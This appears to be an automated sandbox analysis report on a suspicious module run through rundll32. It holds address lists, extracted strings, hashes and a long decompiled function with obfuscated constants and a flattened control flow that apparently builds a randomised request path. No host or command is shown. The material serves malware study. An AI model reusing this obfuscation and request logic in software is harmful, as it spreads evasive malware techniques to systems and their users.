0x002abd70
0x002abf35
0x002abf3a
0x002abf3d
0x002abf3d
0x002abdf1
0x002abdf1
0x00000000
0x002abdf1
0x002abd7c
0x002abe21
0x002abe23
0x002abe25
0x002abe31
0x002abe46
0x002abe48
0x002abe48
0x002abe85
0x002abe8c
0x002abe90
0x002abe91
0x002abe92
0x002abe9c
0x002abea3
0x002abeae
0x002abeb5
0x002abec5
0x002abece
0x002abed2
0x002abed7
0x002abeda
0x002abedc
0x00000000
0x002abede
0x002abef5
0x002abf05
0x002abf0a
0x002abf0d
0x002abf14
0x00000000
0x002abf14
0x002abedc
0x002abd88
0x002abe15
0x002abe1c
0x00000000
0x002abe1c
0x002abd90
0x002abde4
0x002abde9
0x002abdec
0x00000000
0x002abdec
0x002abd98
0x002ac186
0x002ac186
0x002ac18c
0x002abdc8
0x002abdd2
0x002abdd2
0x002abd5c
0x002abd5c
0x002abd5e
0x002abd5e
0x00000000
0x002abd5e
0x00000000
0x002abd5c
0x002abdbe
0x00000000
0x002abfa1
0x002abfa1
0x002abfa7
0x002ac145
0x002ac158
0x002ac166
0x002ac172
0x002ac175
0x002ac17a
0x002ac17e
0x002ac181
0x00000000
0x002ac181
0x002abfad
0x002abfb3
0x002ac108
0x00000000
0x002ac108
0x002abfbe
0x002abfc0
0x002ac0f6
0x002ac0f8
0x002ac0ff
0x002ac100
0x00000000
0x002ac100
0x002abfc6
0x002abfcc
0x002ac08b
0x002ac08d
0x002ac093
0x002ac093
0x002ac08f
0x002ac08f
0x002ac08f
0x002ac095
0x002ac097
0x002ac09e
0x002ac09e
0x002ac099
0x002ac099
0x002ac099
0x002ac0cb
0x002ac0d0
0x002ac0d5
0x002ac0dd
0x00000000
0x002ac0dd
0x002abfd2
0x002abfd8
0x00000000
0x00000000
0x002abff9
0x002abffa
0x002abffc
0x002ac003
0x002ac008
0x002ac00a
0x002ac00d
0x002ac00f
0x002ac011
0x002ac025
0x002ac02c
0x002ac031
0x002ac034
0x002ac036
0x002ac05c
0x002ac061
0x002ac064
0x002ac064
0x002ac07b
0x002ac080
0x002ac081
0x00000000
0x002ac081
0x002abd5c

Strings

9x, xrefs: 002ABAA6
8I, xrefs: 002ABC94
~X, xrefs: 002ABA04
6, xrefs: 002AB815
_h, xrefs: 002AB702
L", xrefs: 002AB5FC
@M, xrefs: 002AB8FC
8@, xrefs: 002AB785
(, xrefs: 002AB41D
X3, xrefs: 002ABA1A
rX, xrefs: 002ABC6B
|t, xrefs: 002AB77A
1f, xrefs: 002ABCB8
NE, xrefs: 002AB83D
7~, xrefs: 002AB9B5
K*, xrefs: 002AB5F4
/g, xrefs: 002AB2F0
?N, xrefs: 002AB2CA
6k, xrefs: 002ABD2F
x, xrefs: 002AB64E
$, xrefs: 002AB690
6 %, xrefs: 002AB4D6
sd, xrefs: 002ABCF4
0V, xrefs: 002AB9E3
P:, xrefs: 002AB929
]#, xrefs: 002AB8B6
kh, xrefs: 002ABBF6

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6 %$$$($/g$0V$1f$6k$7~$8@$8I$9x$?N$@M$K*$L"$NE$X3$]#$_h$kh$rX$sd$|t$~X$6$P:$x
API String ID: 0-2249525640
Opcode ID: 6f7222480c2f3fc8d8eb5a9f81b53eb4074d720ac2ee730c91576300cebaa1c7
Instruction ID: 009f33e90de77b5493d6e6b3d04b6e4cd4dfda7bb518a36e2effa872a7ecfbc2
Opcode Fuzzy Hash: 6f7222480c2f3fc8d8eb5a9f81b53eb4074d720ac2ee730c91576300cebaa1c7
Instruction Fuzzy Hash: 02820F715083818BE378CF25C98AB9BFBE1BBC5314F10891DE5D9862A0DBB58959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002A39E1, Relevance: 31.9, Strings: 25, Instructions: 684
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002A39E1(intOrPtr __ecx, void* __edx, intOrPtr _a8, intOrPtr* _a12) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr _v2820;
				intOrPtr _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				intOrPtr _v2848;
				char _v2852;
				signed int _v2856;
				signed int _v2860;
				intOrPtr _v2864;
				short _v2868;
				signed int _v2872;
				intOrPtr _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				signed int _v2936;
				signed int _v2940;
				signed int _v2944;
				signed int _v2948;
				signed int _v2952;
				signed int _v2956;
				signed int _v2960;
				signed int _v2964;
				signed int _v2968;
				signed int _v2972;
				signed int _v2976;
				signed int _v2980;
				signed int _v2984;
				signed int _v2988;
				signed int _v2992;
				signed int _v2996;
				signed int _v3000;
				signed int _v3004;
				signed int _v3008;
				signed int _v3012;
				signed int _v3016;
				signed int _v3020;
				signed int _v3024;
				signed int _v3028;
				signed int _v3032;
				signed int _v3036;
				signed int _v3040;
				signed int _v3044;
				signed int _v3048;
				signed int _v3052;
				unsigned int _v3056;
				signed int _v3060;
				signed int _v3064;
				signed int _v3068;
				signed int _v3072;
				signed int _v3076;
				signed int _v3080;
				signed int _v3084;
				signed int _v3088;
				signed int _v3092;
				signed int _v3096;
				signed int _v3100;
				signed int _v3104;
				signed int _v3108;
				signed int _v3112;
				signed int _v3116;
				signed int _v3120;
				signed int _v3124;
				signed int _v3128;
				signed int _v3132;
				signed int _v3136;
				signed int _v3140;
				signed int _v3144;
				signed int _v3148;
				signed int _v3152;
				signed int _v3156;
				intOrPtr _v3160;
				void* __edi;
				intOrPtr _t696;
				void* _t697;
				intOrPtr _t724;
				void* _t745;
				intOrPtr _t746;
				intOrPtr _t750;
				intOrPtr _t753;
				intOrPtr _t756;
				intOrPtr _t761;
				short _t764;
				short _t765;
				intOrPtr _t767;
				intOrPtr _t769;
				signed int _t774;
				signed int _t777;
				signed int _t779;
				signed int _t790;
				signed int _t793;
				signed int _t800;
				short* _t840;
				short* _t841;
				intOrPtr _t842;
				signed int _t845;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				char _t856;
				void* _t860;
				void* _t861;
				void* _t864;
				void* _t865;

				_t839 = _a12;
				_push(_a12);
				_push(_a8);
				_t842 = __ecx;
				_push(1);
				_push(__edx);
				_push(__ecx);
				_v2876 = __ecx;
				E0029E171(1);
				_v2928 = 0xf006;
				_t860 =  &_v3160 + 0x14;
				_v2928 = _v2928 + 0xffff5e31;
				_v2928 = _v2928 ^ 0x00006d79;
				_t765 = 0;
				_v2888 = 0x597f;
				_t769 = 0x122826c5;
				_v2888 = _v2888 + 0xffffb247;
				_v2888 = _v2888 ^ 0x00007c36;
				_v2884 = 0x51d0;
				_v2884 = _v2884 ^ 0x8a9688d9;
				_v2884 = _v2884 ^ 0x8a96f946;
				_v3056 = 0xceaf;
				_v3056 = _v3056 + 0x1acd;
				_v3056 = _v3056 >> 7;
				_v3056 = _v3056 ^ 0x00006454;
				_v3048 = 0xceb3;
				_v3048 = _v3048 ^ 0x12175997;
				_v3048 = _v3048 | 0xf5c16a9f;
				_v3048 = _v3048 ^ 0xf7d78808;
				_v3148 = 0xe1f5;
				_v3148 = _v3148 ^ 0x25d59e8c;
				_v3148 = _v3148 >> 6;
				_v3148 = _v3148 | 0x248df7b4;
				_v3148 = _v3148 ^ 0x249ffb72;
				_v2908 = 0xc5d4;
				_t849 = 0x76;
				_v2868 = 0;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 ^ 0x003d5a71;
				_v3152 = 0x93e9;
				_v3152 = _v3152 * 6;
				_v3152 = _v3152 >> 0xb;
				_v3152 = _v3152 << 5;
				_v3152 = _v3152 ^ 0x00005fd5;
				_v2892 = 0x9ecc;
				_v2892 = _v2892 + 0xb107;
				_v2892 = _v2892 ^ 0x00016d04;
				_v3128 = 0x2d62;
				_v3128 = _v3128 + 0xf3e9;
				_v3128 = _v3128 + 0xffff0590;
				_v3128 = _v3128 << 0x10;
				_v3128 = _v3128 ^ 0x26db5ed9;
				_v3136 = 0xddca;
				_v3136 = _v3136 / _t849;
				_v3136 = _v3136 | 0x0268d28b;
				_v3136 = _v3136 ^ 0x8c667b72;
				_v3136 = _v3136 ^ 0x8e0e8619;
				_v3144 = 0xbece;
				_v3144 = _v3144 << 0x10;
				_v3144 = _v3144 + 0xffffac2b;
				_v3144 = _v3144 | 0x2bf18190;
				_v3144 = _v3144 ^ 0xbffde376;
				_v3072 = 0x3148;
				_v3072 = _v3072 << 2;
				_v3072 = _v3072 + 0xffff8f4a;
				_v3072 = _v3072 + 0xffffdf48;
				_v3072 = _v3072 ^ 0x000051d3;
				_v2932 = 0xc7a4;
				_v2932 = _v2932 + 0xffffc500;
				_v2932 = _v2932 ^ 0x0000b74d;
				_v2948 = 0xf96a;
				_v2948 = _v2948 ^ 0xb2071267;
				_v2948 = _v2948 ^ 0xb207f6fd;
				_v3060 = 0x6490;
				_v3060 = _v3060 | 0x8d698005;
				_v3060 = _v3060 << 9;
				_v3060 = _v3060 ^ 0xd3c9090c;
				_v3040 = 0xf19b;
				_t850 = 0x62;
				_v3040 = _v3040 * 6;
				_v3040 = _v3040 >> 8;
				_v3040 = _v3040 ^ 0x00006fb8;
				_v3064 = 0xab2e;
				_v3064 = _v3064 | 0x54e1f507;
				_v3064 = _v3064 ^ 0xa19437d9;
				_v3064 = _v3064 ^ 0xf575a828;
				_v3116 = 0x8b86;
				_v3116 = _v3116 + 0x3c8d;
				_v3116 = _v3116 | 0x15278ec9;
				_v3116 = _v3116 * 0x24;
				_v3116 = _v3116 ^ 0xf999749d;
				_v2980 = 0xb15d;
				_v2980 = _v2980 * 0x1c;
				_v2980 = _v2980 * 0x4f;
				_v2980 = _v2980 ^ 0x05fce6e2;
				_v3012 = 0xe1c9;
				_v3012 = _v3012 / _t850;
				_v3012 = _v3012 << 2;
				_v3012 = _v3012 ^ 0x000008f2;
				_v3092 = 0xcdf8;
				_v3092 = _v3092 << 0xb;
				_v3092 = _v3092 | 0x7fef6ef7;
				_v3092 = _v3092 ^ 0x7fefb0be;
				_v3028 = 0xe773;
				_v3028 = _v3028 ^ 0xd4d35239;
				_v3028 = _v3028 + 0xd233;
				_v3028 = _v3028 ^ 0xd4d4a9ea;
				_v2972 = 0x9acc;
				_v2972 = _v2972 + 0xffff9d51;
				_v2972 = _v2972 + 0x2466;
				_v2972 = _v2972 ^ 0x00003d68;
				_v3132 = 0x7073;
				_v3132 = _v3132 | 0xfe02725f;
				_v3132 = _v3132 + 0x90ed;
				_v3132 = _v3132 * 0x5f;
				_v3132 = _v3132 ^ 0x431e27aa;
				_v3020 = 0x1ed6;
				_v3020 = _v3020 >> 7;
				_v3020 = _v3020 * 7;
				_v3020 = _v3020 ^ 0x00000b46;
				_v3076 = 0xf956;
				_v3076 = _v3076 << 6;
				_v3076 = _v3076 << 0xd;
				_v3076 = _v3076 >> 6;
				_v3076 = _v3076 ^ 0x032af4d4;
				_v3140 = 0xe0d7;
				_v3140 = _v3140 ^ 0xbc49f1ee;
				_v3140 = _v3140 | 0xbaff3cf7;
				_v3140 = _v3140 ^ 0xbeff3bd7;
				_v2900 = 0xcfb;
				_v2900 = _v2900 ^ 0xc36cce10;
				_v2900 = _v2900 ^ 0xc36cc7a7;
				_v3108 = 0xd734;
				_v3108 = _v3108 * 0x55;
				_v3108 = _v3108 + 0xffffc23f;
				_v3108 = _v3108 | 0xe0064d4c;
				_v3108 = _v3108 ^ 0xe047372a;
				_v2988 = 0x2d99;
				_v2988 = _v2988 | 0xf634325b;
				_v2988 = _v2988 << 3;
				_v2988 = _v2988 ^ 0xb1a18159;
				_v2956 = 0x8e49;
				_v2956 = _v2956 ^ 0x317adff0;
				_v2956 = _v2956 + 0xff71;
				_v2956 = _v2956 ^ 0x317b2f81;
				_v3100 = 0xe03d;
				_t851 = 6;
				_v3100 = _v3100 / _t851;
				_v3100 = _v3100 + 0x6786;
				_t852 = 0x5a;
				_v3100 = _v3100 / _t852;
				_v3100 = _v3100 ^ 0x00003632;
				_v2916 = 0xdbd8;
				_v2916 = _v2916 ^ 0xc47651f8;
				_v2916 = _v2916 ^ 0xc476dc33;
				_v3044 = 0x6386;
				_v3044 = _v3044 | 0xf7f7773f;
				_v3044 = _v3044 ^ 0xf7f72261;
				_v2896 = 0xeb08;
				_v2896 = _v2896 >> 0xf;
				_v2896 = _v2896 ^ 0x0000161a;
				_v2964 = 0x3757;
				_v2964 = _v2964 ^ 0xb842d749;
				_v2964 = _v2964 >> 4;
				_v2964 = _v2964 ^ 0x0b847e39;
				_v3104 = 0xe457;
				_v3104 = _v3104 << 0x10;
				_v3104 = _v3104 << 5;
				_v3104 = _v3104 << 0x10;
				_v3104 = _v3104 ^ 0x00004831;
				_v3016 = 0x6f58;
				_v3016 = _v3016 | 0x2b2730ea;
				_t292 =  &_v3016; // 0x2b2730ea
				_t853 = 0x35;
				_v3016 =  *_t292 * 0x3f;
				_v3016 = _v3016 ^ 0x9eb8709b;
				_v3112 = 0x7907;
				_v3112 = _v3112 * 0x17;
				_v3112 = _v3112 * 0x48;
				_v3112 = _v3112 + 0x5449;
				_v3112 = _v3112 ^ 0x030f5843;
				_v2904 = 0x337c;
				_v2904 = _v2904 ^ 0x4212fafe;
				_v2904 = _v2904 ^ 0x4212b61a;
				_v2992 = 0x1687;
				_v2992 = _v2992 + 0xffffc1f0;
				_v2992 = _v2992 / _t853;
				_v2992 = _v2992 ^ 0x04d4fea0;
				_v3000 = 0x9e7f;
				_v3000 = _v3000 * 0x2d;
				_v3000 = _v3000 | 0xca2ea772;
				_v3000 = _v3000 ^ 0xca3ffc76;
				_v3008 = 0x5219;
				_v3008 = _v3008 ^ 0xa82c57ba;
				_v3008 = _v3008 + 0xffff8e06;
				_v3008 = _v3008 ^ 0xa82bf961;
				_v2912 = 0xe428;
				_v2912 = _v2912 >> 2;
				_v2912 = _v2912 ^ 0x00003bf8;
				_v3096 = 0x9cb7;
				_v3096 = _v3096 | 0x5b75b6f7;
				_v3096 = _v3096 * 0x3d;
				_v3096 = _v3096 * 0x48;
				_v3096 = _v3096 ^ 0x1c146541;
				_v2984 = 0xcac8;
				_t854 = 0x76;
				_v2984 = _v2984 / _t854;
				_v2984 = _v2984 | 0xa8d63fca;
				_v2984 = _v2984 ^ 0xa8d601bb;
				_v3088 = 0x430a;
				_v3088 = _v3088 ^ 0x9f6ea207;
				_v3088 = _v3088 + 0xffff1c4e;
				_v3088 = _v3088 ^ 0x717e2497;
				_v3088 = _v3088 ^ 0xee13d21f;
				_v2944 = 0x3230;
				_v2944 = _v2944 << 8;
				_v2944 = _v2944 ^ 0x00322685;
				_v3024 = 0x5cb2;
				_v3024 = _v3024 + 0x9fe6;
				_v3024 = _v3024 + 0xffffb2bd;
				_v3024 = _v3024 ^ 0x00009e0e;
				_v3032 = 0xc0e8;
				_v3032 = _v3032 ^ 0x7becda2f;
				_v3032 = _v3032 + 0xffff6f0d;
				_v3032 = _v3032 ^ 0x7beb9bf2;
				_v2920 = 0x65a0;
				_v2920 = _v2920 + 0xd736;
				_v2920 = _v2920 ^ 0x000139a9;
				_v2924 = 0x5083;
				_v2924 = _v2924 + 0x59cc;
				_v2924 = _v2924 ^ 0x0000f707;
				_v3068 = 0x86f8;
				_v3068 = _v3068 << 8;
				_v3068 = _v3068 | 0x7a86fc50;
				_v3068 = _v3068 ^ 0x7a86c1ed;
				_v3120 = 0x857c;
				_t855 = 0x43;
				_v3120 = _v3120 * 0x60;
				_v3120 = _v3120 * 0x19;
				_v3120 = _v3120 << 1;
				_v3120 = _v3120 ^ 0x09c6d6a0;
				_v2960 = 0xda3d;
				_v2960 = _v2960 << 9;
				_v2960 = _v2960 + 0xffffd369;
				_v2960 = _v2960 ^ 0x01b47a39;
				_v2968 = 0x8770;
				_v2968 = _v2968 | 0x22b91695;
				_v2968 = _v2968 + 0xcd52;
				_v2968 = _v2968 ^ 0x22ba6b60;
				_v2976 = 0x6162;
				_v2976 = _v2976 | 0x0b801a40;
				_v2976 = _v2976 + 0xdb1c;
				_v2976 = _v2976 ^ 0x0b814300;
				_v2940 = 0x6c41;
				_v2940 = _v2940 | 0x31be0dbb;
				_v2940 = _v2940 ^ 0x31be1c15;
				_v3036 = 0xe4c0;
				_v3036 = _v3036 | 0xce2ca5d0;
				_v3036 = _v3036 * 0x64;
				_v3036 = _v3036 ^ 0x8989b291;
				_v2880 = 0xb319;
				_v2880 = _v2880 + 0xffff6f25;
				_v2880 = _v2880 ^ 0x00007aab;
				_v2936 = 0x20e4;
				_v2936 = _v2936 / _t855;
				_v2936 = _v2936 ^ 0x00006061;
				_v2996 = 0x7312;
				_v2996 = _v2996 + 0x9ed2;
				_v2996 = _v2996 << 6;
				_v2996 = _v2996 ^ 0x00445532;
				_v3084 = 0x43a7;
				_v3084 = _v3084 | 0xea2e2a73;
				_v3084 = _v3084 ^ 0xccadc40f;
				_v3084 = _v3084 + 0xffffe2bd;
				_v3084 = _v3084 ^ 0x2683f586;
				_v3124 = 0x2a4e;
				_v3124 = _v3124 * 0x1c;
				_v3124 = _v3124 | 0x2f25bc51;
				_v3124 = _v3124 + 0x1de;
				_v3124 = _v3124 ^ 0x2f25b57b;
				_v3052 = 0x8dcd;
				_v3052 = _v3052 + 0xffffe03b;
				_v3052 = _v3052 + 0xffff4c85;
				_v3052 = _v3052 ^ 0xfffff37a;
				_v3004 = 0xcbf1;
				_v3004 = _v3004 | 0x47bef84c;
				_v3004 = _v3004 + 0xffff64dc;
				_v3004 = _v3004 ^ 0x47be4748;
				_v2952 = 0x3eb1;
				_v2952 = _v2952 << 5;
				_v2952 = _v2952 >> 0xa;
				_v2952 = _v2952 ^ 0x00000206;
				_v3080 = 0xdc90;
				_v3080 = _v3080 + 0xffff270f;
				_v3080 = _v3080 * 0xe;
				_v3080 = _v3080 >> 1;
				_v3080 = _v3080 ^ 0x00005d8a;
				_t856 = _v2852;
				_v3160 = _v2848;
				_v2864 = _t856;
				while(1) {
					_t817 = _v3156;
					while(1) {
						L2:
						_t864 = _t769 - 0x199af63b;
						if(_t864 <= 0) {
							break;
						}
						__eflags = _t769 - 0x1b8163a4;
						if(_t769 == 0x1b8163a4) {
							_t696 = E00297AE4(_t842, _v2960, _v2968, _v2976, _v2940,  &_v2860);
							_t860 = _t860 + 0x10;
							_t769 = 0x199af63b;
							__eflags = _t696;
							_t697 = 1;
							_t765 =  !=  ? _t697 : _t765;
							_v2868 = _t765;
							goto L45;
						} else {
							__eflags = _t769 - 0x1c2ced04;
							if(__eflags == 0) {
								_push(_v3112);
								_push(_v3016);
								E0029EF2E(E00296ABA(_v3104, 0x2af100, __eflags), __eflags, _v2992, _v3000,  &_v2560, _v3008, 0x400,  &_v2048, _v2912,  &_v2688,  &_v2816, _v3096);
								E0029F935(_v2984, _t700, _v3088, _v2944);
								_t860 = _t860 + 0x38;
								_t769 = 0xf4be180;
								goto L41;
							} else {
								__eflags = _t769 - 0x1cd29216;
								if(_t769 == 0x1cd29216) {
									_v2860 = _v2860 & 0x00000000;
									_v2856 = _v2856 & 0x00000000;
									_t622 =  &_v3120; // 0xe047372a
									_t774 = _v3024;
									E002AB19F(_t774, _v3032, _v2920,  &_v2688, _v2924,  &_v2560,  &_v2860, _v3068,  *_t622,  &_v2852, _t817,  &_v2048);
									_t860 = _t860 + 0x28;
									asm("sbb ecx, ecx");
									_t769 = (_t774 & 0x0615281c) + 0x156c3b88;
									goto L12;
								} else {
									__eflags = _t769 - 0x23a77b80;
									if(_t769 == 0x23a77b80) {
										_t847 = E00296AA7( *((intOrPtr*)(_t839 + 4)));
										_push(_t769);
										_t856 = E002A9E2B(_t718);
										_t861 = _t860 + 0xc;
										_v2864 = _t856;
										__eflags = _t856;
										if(__eflags != 0) {
											_t724 = E002A3600( *_t839, _t847, __eflags, _v2892, _v3128, _t856, _v3136, _v3144,  *((intOrPtr*)(_t839 + 4)));
											_t860 = _t861 + 0x18;
											_v3160 = _t724;
											__eflags = _t724;
											if(__eflags == 0) {
												_push(_v2932);
												_t777 = _v3072;
												L48:
												E0029EF80(_t777, _t856);
											} else {
												_t769 = 0x9f13b62;
												L41:
												_t817 = _v3156;
												goto L35;
											}
										}
									} else {
										__eflags = _t769 - 0x304496b8;
										if(_t769 == 0x304496b8) {
											_t779 =  &_v2844;
											_t599 =  &_v3116; // 0xe047372a
											E002A5D36(_t779,  &_v2836, _v3064,  *_t599, _v2980, _v3012);
											_t860 = _t860 + 0x10;
											asm("sbb ecx, ecx");
											_t769 = (_t779 & 0x3803c052) + 0x279610c;
											goto L12;
										} else {
											__eflags = _t769 - 0x31ff1d09;
											if(_t769 == 0x31ff1d09) {
												E0029EF80(_v3084, _v2836, _v3124);
												_t769 = 0x279610c;
												L12:
												while(1) {
													_t817 = _v3156;
													goto L2;
												}
											} else {
												__eflags = _t769 - 0x3a7d215e;
												if(__eflags != 0) {
													L45:
													__eflags = _t769 - 0x2678ae6d;
													if(__eflags != 0) {
														while(1) {
															_t817 = _v3156;
															goto L2;
														}
													}
												} else {
													_push(_v2972);
													_push(_v3028);
													_t745 = E00296ABA(_v3092, 0x2af0b0, __eflags);
													_t746 =  *0x2af9d4; // 0x0
													_t750 =  *0x2af9d4; // 0x0
													_t753 =  *0x2af9d4; // 0x0
													_t756 =  *0x2af9d4; // 0x0
													E0029927F(_t745, __eflags, _v3020, _v3076, _v3140,  *( *(_t756 + 8)) & 0x000000ff, _v2900,  *( *((intOrPtr*)(_t753 + 8)) + 1) & 0x000000ff, _v3108,  *( *((intOrPtr*)(_t750 + 8)) + 3) & 0x000000ff,  &_v2688, _v2988,  *( *((intOrPtr*)(_t746 + 8)) + 2) & 0x000000ff);
													E0029F935(_v2956, _t745, _v3100, _v2916);
													_t761 =  *0x2af9d4; // 0x0
													_t860 = _t860 + 0x3c;
													_t769 = 0x15c4d247;
													_t817 =  *( *((intOrPtr*)(_t761 + 8)) + 4) & 0x0000ffff;
													_t724 = _v3160;
													_v3156 =  *( *((intOrPtr*)(_t761 + 8)) + 4) & 0x0000ffff;
													L35:
													_t842 = _v2876;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L49:
						return _t765;
					}
					if(_t864 == 0) {
						E0029EF80(_v3036, _v2860, _v2880);
						_t769 = 0x156c3b88;
						goto L12;
					} else {
						_t865 = _t769 - 0xf4be180;
						if(_t865 > 0) {
							__eflags = _t769 - 0x122826c5;
							if(_t769 == 0x122826c5) {
								_v2872 = E002A1214();
								_t769 = 0x23a77b80;
								goto L12;
							} else {
								__eflags = _t769 - 0x156c3b88;
								if(_t769 == 0x156c3b88) {
									E0029EF80(_v2936, _v2852, _v2996);
									_t769 = 0x31ff1d09;
									goto L12;
								} else {
									__eflags = _t769 - 0x15c4d247;
									if(_t769 != 0x15c4d247) {
										goto L45;
									} else {
										_t840 =  &_v2560;
										_t790 = 6;
										_t767 = _v2872 % _t790 + 1;
										__eflags = _t767;
										if(__eflags != 0) {
											__eflags = 1;
											do {
												_t845 = (_v2872 & 0x0000000f) + 4;
												E00298068( &_v2872, _t845, _t840, _v3044, 1, _v2896, _v2964);
												_t860 = _t860 + 0x14;
												_t841 = _t840 + _t845 * 2;
												_t764 = 0x2f;
												 *_t841 = _t764;
												_t840 = _t841 + 2;
												_t767 = _t767 - 1;
												__eflags = _t767;
											} while (__eflags != 0);
											_t856 = _v2864;
											_t842 = _v2876;
										}
										_t765 = _v2868;
										 *_t840 = 0;
										_t769 = 0x150ae86;
										_t724 = _v3160;
										_t839 = _a12;
										continue;
									}
								}
							}
						} else {
							if(_t865 == 0) {
								E0029BB28( &_v2836,  &_v2816,  &_v2852);
								_pop(_t793);
								asm("sbb ecx, ecx");
								_t769 = (_t793 & 0xead3750d) + 0x31ff1d09;
								goto L12;
							} else {
								if(_t769 == 0x150ae86) {
									E002AC95E( &_v2816, _t839, __eflags);
									_t769 = 0x1c2ced04;
									goto L12;
								} else {
									if(_t769 == 0x279610c) {
										E0029EF80(_v3052, _v2844, _v3004);
										_t769 = 0xdcfda18;
										goto L12;
									} else {
										if(_t769 == 0x9f13b62) {
											_v2820 = _t724;
											_v2824 = _t856;
											_v2828 = 1;
											_t800 = _v2948;
											E002912B6(_t800,  &_v2844,  &_v2828, _v3060, _v3040);
											_t860 = _t860 + 0xc;
											asm("sbb ecx, ecx");
											_t769 = (_t800 & 0x2274bca0) + 0xdcfda18;
											__eflags = _t769;
											goto L12;
										} else {
											if(_t769 != 0xdcfda18) {
												goto L45;
											} else {
												_push(_v3080);
												_t777 = _v2952;
												goto L48;
											}
										}
									}
								}
							}
						}
					}
					goto L49;
				}
			}

0x002a39eb
0x002a39f4
0x002a39f5
0x002a39fd
0x002a39ff
0x002a3a00
0x002a3a01
0x002a3a02
0x002a3a09
0x002a3a0e
0x002a3a19
0x002a3a1c
0x002a3a29
0x002a3a34
0x002a3a36
0x002a3a41
0x002a3a46
0x002a3a51
0x002a3a5c
0x002a3a67
0x002a3a72
0x002a3a7d
0x002a3a85
0x002a3a8d
0x002a3a92
0x002a3a9a
0x002a3aa5
0x002a3ab0
0x002a3abb
0x002a3ac6
0x002a3ace
0x002a3ad6
0x002a3adb
0x002a3ae3
0x002a3aeb
0x002a3b00
0x002a3b01
0x002a3b08
0x002a3b0f
0x002a3b1a
0x002a3b27
0x002a3b2b
0x002a3b30
0x002a3b35
0x002a3b3d
0x002a3b48
0x002a3b53
0x002a3b5e
0x002a3b66
0x002a3b6e
0x002a3b76
0x002a3b7b
0x002a3b83
0x002a3b91
0x002a3b95
0x002a3b9d
0x002a3ba5
0x002a3bad
0x002a3bb5
0x002a3bba
0x002a3bc2
0x002a3bca
0x002a3bd2
0x002a3bda
0x002a3bdf
0x002a3be7
0x002a3bef
0x002a3bf7
0x002a3c02
0x002a3c0d
0x002a3c1a
0x002a3c25
0x002a3c30
0x002a3c3b
0x002a3c43
0x002a3c4b
0x002a3c50
0x002a3c58
0x002a3c6d
0x002a3c6e
0x002a3c75
0x002a3c7d
0x002a3c88
0x002a3c90
0x002a3c98
0x002a3ca0
0x002a3ca8
0x002a3cb0
0x002a3cb8
0x002a3cc5
0x002a3cc9
0x002a3cd1
0x002a3ce4
0x002a3cf3
0x002a3cfa
0x002a3d05
0x002a3d19
0x002a3d20
0x002a3d28
0x002a3d33
0x002a3d3b
0x002a3d40
0x002a3d48
0x002a3d50
0x002a3d5b
0x002a3d66
0x002a3d71
0x002a3d7c
0x002a3d87
0x002a3d92
0x002a3d9d
0x002a3da8
0x002a3db0
0x002a3db8
0x002a3dc5
0x002a3dc9
0x002a3dd1
0x002a3ddc
0x002a3dec
0x002a3df3
0x002a3dfe
0x002a3e06
0x002a3e0b
0x002a3e10
0x002a3e15
0x002a3e1d
0x002a3e25
0x002a3e2d
0x002a3e35
0x002a3e3d
0x002a3e48
0x002a3e53
0x002a3e5e
0x002a3e6b
0x002a3e6f
0x002a3e77
0x002a3e7f
0x002a3e87
0x002a3e92
0x002a3e9d
0x002a3ea7
0x002a3eb2
0x002a3ebd
0x002a3ec8
0x002a3ed3
0x002a3ede
0x002a3eec
0x002a3ef1
0x002a3ef7
0x002a3f03
0x002a3f08
0x002a3f0e
0x002a3f16
0x002a3f21
0x002a3f2c
0x002a3f37
0x002a3f42
0x002a3f4d
0x002a3f58
0x002a3f63
0x002a3f6b
0x002a3f76
0x002a3f81
0x002a3f8c
0x002a3f94
0x002a3f9f
0x002a3fa7
0x002a3fac
0x002a3fb1
0x002a3fb6
0x002a3fbe
0x002a3fc9
0x002a3fd4
0x002a3fdc
0x002a3fdd
0x002a3fe4
0x002a3fef
0x002a3ffc
0x002a4005
0x002a4009
0x002a4011
0x002a4019
0x002a4024
0x002a402f
0x002a403a
0x002a4045
0x002a4059
0x002a4060
0x002a406b
0x002a407e
0x002a4085
0x002a4090
0x002a409b
0x002a40a6
0x002a40b1
0x002a40bc
0x002a40c7
0x002a40d2
0x002a40da
0x002a40e5
0x002a40ed
0x002a40fa
0x002a4103
0x002a4107
0x002a4111
0x002a4125
0x002a412a
0x002a4133
0x002a413e
0x002a4149
0x002a4151
0x002a4159
0x002a4161
0x002a4169
0x002a4171
0x002a417c
0x002a4184
0x002a418f
0x002a419a
0x002a41a5
0x002a41b0
0x002a41bb
0x002a41c6
0x002a41d1
0x002a41dc
0x002a41e7
0x002a41f2
0x002a41fd
0x002a4208
0x002a4213
0x002a421e
0x002a4229
0x002a4231
0x002a4236
0x002a423e
0x002a4246
0x002a4253
0x002a4254
0x002a425d
0x002a4261
0x002a4265
0x002a426d
0x002a4278
0x002a4280
0x002a428b
0x002a4296
0x002a42a1
0x002a42ac
0x002a42b7
0x002a42c2
0x002a42cd
0x002a42d8
0x002a42e3
0x002a42ee
0x002a42f9
0x002a4304
0x002a430f
0x002a431a
0x002a432d
0x002a4334
0x002a433f
0x002a434a
0x002a4355
0x002a4360
0x002a4374
0x002a437b
0x002a4386
0x002a4391
0x002a439c
0x002a43a4
0x002a43af
0x002a43b7
0x002a43bf
0x002a43c7
0x002a43cf
0x002a43d7
0x002a43e4
0x002a43e8
0x002a43f0
0x002a43f8
0x002a4400
0x002a4408
0x002a4410
0x002a4418
0x002a4420
0x002a442b
0x002a4436
